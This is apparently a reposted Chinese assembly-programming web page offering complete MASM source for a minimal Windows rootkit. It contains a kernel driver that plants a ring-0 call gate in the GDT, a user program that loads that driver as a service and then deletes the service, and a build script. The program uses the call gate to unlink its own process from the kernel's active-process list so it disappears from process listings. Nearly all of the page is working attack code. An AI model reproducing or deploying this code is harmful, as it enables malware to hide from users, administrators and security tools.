Smallest hideproc

来源(白菜乐园)

From: http://www.crackbest.org/read.php?tid=16

Hide.sys:=========================================
.386
.model flat, stdcall
option casemap:none
include \masm32\include\w2k\ntstatus.inc
include \masm32\include\w2k\ntddk.inc

.code
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
    pushfd
    pushad
    push edx
    sgdt [esp-2]
    pop edx
    mov eax,edx
    mov ecx,350h
    .if dword ptr [edx+ecx+2]!=0ec000358h
        mov byte ptr [edx],0c3h
        mov word ptr [edx+ecx],ax
        shr eax,16
        mov word ptr [edx+ecx+6],ax
        mov dword ptr [edx+ecx+2],0ec000358h
        mov dword ptr [edx+ecx+8],0000ffffh
        mov dword ptr [edx+ecx+12],00cf9a00h
    .endif
    popad
    popfd
    mov eax, STATUS_DEVICE_CONFIGURATION_ERROR
    ret
DriverEntry endp
end DriverEntry


Test.exe==========================================
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
include \masm32\macros\macros.asm
include \masm32\include\advapi32.inc
includelib \masm32\lib\advapi32.lib

CTEXT MACRO text:VARARG
local TxtName
.data
TxtName BYTE text,0
.code
EXITM <ADDR TxtName>
ENDM

.data
Callgt dd 0
dw 353h

.code
start:

;Hidden Current Process
HideProc proc
    local hSCManager:HANDLE
    local hService:HANDLE
    local acDriverPath[MAX_PATH]:CHAR
    invoke OpenSCManager, NULL, NULL, SC_MANAGER_CREATE_SERVICE
    .if eax != NULL
        mov hSCManager, eax
        push eax
        invoke GetFullPathName, CTXT("Hide.sys",0), sizeof acDriverPath, addr acDriverPath, esp
        pop eax
        invoke CreateService, hSCManager, CTXT("Hidden",0), CTXT("System",0), \
        SERVICE_START + DELETE, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, \
        SERVICE_ERROR_IGNORE, addr acDriverPath, NULL, NULL, NULL, NULL, NULL
        .if eax != NULL
            mov hService, eax
            invoke StartService, hService, 0, NULL
            invoke DeleteService, hService
            invoke CloseServiceHandle, hService
            invoke CloseServiceHandle, hSCManager
        .endif
    .endif
    call fword ptr [Callgt]
    mov eax,esp
    mov esp,[esp+4]
    push eax
    pushfd
    pushad
    mov eax,dword ptr ds:[0ffdff124h]
    mov eax,[eax+44h]
    mov ecx,088h
    mov esi,dword ptr[eax+ecx]
    mov edi,dword ptr[eax+ecx+4]
    mov dword ptr[esi+4],edi
    mov dword ptr[edi],esi
    popad
    popfd
    pop esp
    push offset Exit
    retf
Exit:
KillProc:
    Invoke GetAsyncKeyState, VK_F12
    test eax,eax
    jz KillProc
    invoke ExitProcess,0
HideProc endp

end start



Maker.bat:========================================
@echo off
cls
echo :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::
C:\masm32\bin\ml /nologo /c /coff Hidden.asm
C:\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:Hidden.sys /subsystem:native Hidden.obj
echo :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::
C:\masm32\bin\ml /c /coff Proce.asm
C:\masm32\bin\link /subsystem:windows /out:Proce.exe Proce.obj
echo :::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::
del *.obj
pause


Link: http://www.asm32.net/article_details.aspx?id=5235


浏览次数 0 发布时间 2010-03-29 14:14:50 从属分类 Win32汇编编程 【评论】【 】【打印】【关闭
 
| www.asm32.net | 2006版 | 资料中心 | linux | asm/asm32 | C/C++ | VC++ | java | Python | 书签 | ASP.Net书签 | 京ICP备09029108号-1